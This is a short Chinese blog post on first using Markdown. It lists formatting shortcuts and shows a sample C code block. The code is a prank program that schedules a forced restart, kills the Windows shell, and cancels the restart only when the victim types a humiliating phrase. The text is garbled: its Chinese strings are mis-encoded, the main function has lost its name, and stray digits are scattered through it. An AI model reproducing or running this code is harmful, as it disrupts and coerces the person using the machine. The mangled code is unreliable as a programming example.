首次使用MarkDown 1.下划线,ctrl+u 2.斜体,ctrl+l 3.加粗,ctrl+b 4.代码:#include<stdio.h> 12345678910111213141516171819 5.代码块:#include<string.h>#include<stdlib.h>int (){ char a[12],b[12]={"ÎÒÊÇÖí"}; system("shutdown -r -t 90"); system("taskkill/im explorer.exe /f"); system("cls"); bug: printf("˵ÄãÊÇÖín"); scanf("%s",a); if(strcmp(a,b)==0) { system("shutdown -a"); system("explorer.exe"); } else goto bug;} 7.超链接:crtl+k 赞微海报分享
近期评论